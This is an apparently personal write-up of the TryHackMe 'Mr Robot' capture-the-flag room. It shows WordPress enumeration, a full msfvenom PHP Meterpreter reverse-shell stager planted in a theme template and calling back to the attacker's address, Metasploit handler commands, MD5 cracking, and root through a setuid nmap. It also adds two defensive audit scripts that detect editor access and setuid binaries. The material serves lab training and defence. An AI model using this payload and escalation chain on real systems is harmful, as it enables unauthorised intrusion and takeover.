Room Link: https://tryhackme.com/room/mrrobot
IP: 10.10.219.74
Enumeration
Nmap
# first lets run an nmap scan on the common 1000 ports
nmap 10.10.219.74 -v -A
All 1000 scanned ports on 10.10.219.74 are filtered
Nmap was not much help here. I navigated to the IP in my browser and found a web server running on port 80 with its own ‘terminal’ (the site was styled like a terminal and accepted a few commands).
I re-ran nmap against port 80 only, and it reported Apache, so this is probably a Linux box:
nmap 10.10.219.74 -p80 -O -A
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Linux 5.4 (90%)
GoBuster – Brute Force Directory
I also ran a gobuster scan to make sure nothing was hiding in the web directory:
gobuster dir -u 10.10.219.74 -w /usr/share/wordlists/dirb/common.txt
Meanwhile, I played around with some of the commands in the website’s UI and noticed that whatever command you typed was appended to the URL, e.g. /join. Typing /ls returned an error page from a WordPress site, so now we know the server is running some variant of WordPress. The join command asks for an email address. I tried setting up a temporary mailbox to see if anything would be sent to it, but nothing arrived.
Fortunately, the gobuster scan finished and returned quite a lot of results:
┌──(kali㉿kali)-[~/thm]
└─$ gobuster dir -u 10.10.219.74 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.219.74
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/03/31 12:48:56 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.219.74/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.219.74/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.219.74/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.219.74/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.219.74/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.219.74/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.219.74/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.219.74/feed/]
/image (Status: 301) [Size: 0] [--> http://10.10.219.74/image/]
/Image (Status: 301) [Size: 0] [--> http://10.10.219.74/Image/]
/images (Status: 301) [Size: 235] [--> http://10.10.219.74/images/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.219.74/]
/js (Status: 301) [Size: 231] [--> http://10.10.219.74/js/]
/intro (Status: 200) [Size: 516314]
/license (Status: 200) [Size: 309]
/login (Status: 302) [Size: 0] [--> http://10.10.219.74/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.219.74/]
/phpmyadmin (Status: 403) [Size: 94]
/rdf (Status: 301) [Size: 0] [--> http://10.10.219.74/feed/rdf/]
/readme (Status: 200) [Size: 64]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss (Status: 301) [Size: 0] [--> http://10.10.219.74/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.219.74/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.219.74/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.219.74/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.219.74/wp-content/]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.219.74/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-load (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 227]
/wp-login (Status: 200) [Size: 2606]
/wp-mail (Status: 500) [Size: 3064]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.219.74/wp-login.php?action=register]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
2021/03/31 12:53:00 Finished
===============================================================
Gobuster Results Notes
- /admin – Redirect loop
- /sitemap & /sitemap.xml – Nothing
- /wp-login – Takes us to a WordPress login page. Inspecting the page source shows version 4.3.1 attached to many of the CSS files, so that is a possible attack vector
- /robots.txt – Reveals the location of two files: one is a key, the other appears to be some sort of dictionary / wordlist
- /phpmyadmin – We cannot log in, but this suggests MySQL is probably running (I re-ran nmap on the MySQL port and it does show as mysql, but the port is filtered)
- /rdf – some sort of feed; it also shows WordPress v4.3.1
- /license – has a base64-encoded string hidden in the page source
WP Admin Access
The /license page had a base64-encoded string that decodes to what appears to be a username and password. I tested this at /wp-admin and it lets us in! Under Users, we can see our account, elliot, and another account, mich05654, as a subscriber. As an admin, however, we can try to inject or upload something to give us remote access. Under Appearance > Editor > 404 template, I replaced the PHP code with a payload from msfvenom:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.6.64.217 LPORT=4444 -f raw -o payload.php
cat payload.php
/*<?php /**/ error_reporting(0); $ip = '10.6.64.217'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
Now we need to start Metasploit to catch the Meterpreter reverse shell:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.6.64.217
set LPORT 4444
run
Now all we have to do is navigate to /404.php and we receive a hit back on our console! Run shell to drop from Meterpreter into a system shell.
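As an added defensive check (not part of the original writeup), the script below audits a WordPress install for the two conditions the theme-editor step above relies on: the dashboard file editor still being enabled, and theme or plugin PHP files carrying the socket/eval calls the msfvenom stager uses. The WordPress root path argument and the standard wp-config.php / wp-content layout are assumptions.

```shell
#!/bin/sh
# Added defensive audit, not part of the original writeup. It checks a
# WordPress install for the two conditions the theme-editor payload above
# relies on: the dashboard file editor still being enabled, and theme or
# plugin PHP files containing the socket/eval functions the stager calls.
# Assumed layout: <root>/wp-config.php and <root>/wp-content/{themes,plugins}.

# Exit 0 if wp-config.php has an uncommented define('DISALLOW_FILE_EDIT', true).
file_edit_disabled() {
    grep -Ev '^[[:space:]]*(//|#|\*)' "$1/wp-config.php" 2>/dev/null \
        | grep -Eq "DISALLOW_FILE_EDIT['\"][[:space:]]*,[[:space:]]*true"
}

# Print file:line:text for each theme/plugin PHP line calling one of the
# functions used by the msfvenom PHP stager. Exit 0 if any match was found.
find_stager_functions() {
    find "$1/wp-content/themes" "$1/wp-content/plugins" -type f -name '*.php' \
        -exec grep -EnH \
        '(^|[^A-Za-z0-9_])(eval|create_function|stream_socket_client|fsockopen|socket_create)[[:space:]]*\(' \
        {} + 2>/dev/null
}

# Run both checks, print a short report, and return 1 if anything needs action.
audit_wordpress() {
    status=0
    if file_edit_disabled "$1"; then
        echo "[ok]   DISALLOW_FILE_EDIT is set; Appearance > Editor is disabled"
    else
        echo "[warn] DISALLOW_FILE_EDIT not set; add define('DISALLOW_FILE_EDIT', true); to wp-config.php"
        status=1
    fi
    hits=$(find_stager_functions "$1" || true)
    if [ -n "$hits" ]; then
        echo "[warn] socket/eval calls in theme or plugin code (review each line):"
        echo "$hits"
        status=1
    else
        echo "[ok]   no socket/eval calls found under wp-content"
    fi
    return "$status"
}

# Usage: sh wp_audit.sh /var/www/html
if [ "$#" -ge 1 ]; then
    audit_wordpress "$1"
fi
```

Setting DISALLOW_FILE_EDIT removes the Appearance > Editor menu entirely, so a stolen admin login no longer turns straight into code execution through the 404 template.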
Looking around, there is a robot user under /home/robot with key-2-of-3.txt and a file containing the robot account’s password as an MD5 hash.
Let’s crack it with John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt robot.txt --format="Raw-MD5"
<redacted> (robot)
Great! We got his password. But if we try su robot, it tells us we need to run it from a terminal. We need to spawn a proper TTY, which we can do like so:
python -c 'import pty; pty.spawn("/bin/bash")'
And now we can su robot and grab the flag!
PrivEsc
I can only assume the last flag is under the root home directory, so let’s see how to privesc.
I ran this command to find any SUID/SGID binaries we might be able to exploit:
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
One interesting hit with the root SUID bit set is /usr/local/bin/nmap. I looked up nmap on GTFOBins and it says we can spawn an interactive shell using nmap --interactive and then running !sh
It worked! Running whoami shows we are root, and the third flag is in the root directory!
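As an added hardening check (not part of the original writeup), the script below reuses the setuid/setgid find predicate from above to list set-id files and reports those that are not on a baseline of binaries expected to carry the bit; the baseline list is an assumption and should be adjusted per distribution.

```shell
#!/bin/sh
# Added hardening check, not part of the original writeup. It reuses the
# setuid/setgid find predicate from above to list set-id files below a
# directory and reports those whose name is not on a baseline of binaries
# that legitimately need the bit (the baseline is an assumption; adjust it
# to the distribution). A setuid nmap under /usr/local/bin would be
# reported here long before anyone reaches it with --interactive.

BASELINE='su sudo passwd mount umount ping newgrp chsh chfn gpasswd'

# Exit 0 if the file has the setuid or setgid bit set (POSIX test -u / -g).
has_setid_bit() {
    [ -u "$1" ] || [ -g "$1" ]
}

# Print every regular file below $1 with the setuid or setgid bit, one per line.
list_setid_files() {
    find "$1" -xdev -type f \( -perm -u+s -o -perm -g+s \) -print 2>/dev/null
}

# Print the set-id files whose basename is not in BASELINE; these are the
# candidates to review and, if unneeded, strip with: chmod u-s,g-s <file>
unexpected_setid_files() {
    list_setid_files "$1" | while IFS= read -r f; do
        name=$(basename "$f")
        case " $BASELINE " in
            *" $name "*) ;;        # expected set-id binary, skip
            *) echo "$f" ;;
        esac
    done
}

# Usage: sh setid_audit.sh /    (run as a user that can read the whole tree)
if [ "$#" -ge 1 ]; then
    unexpected_setid_files "$1"
fi
```

Running this on a schedule and diffing the output against a known-good copy turns a new or unexpected set-id file into an alert rather than a privilege-escalation path.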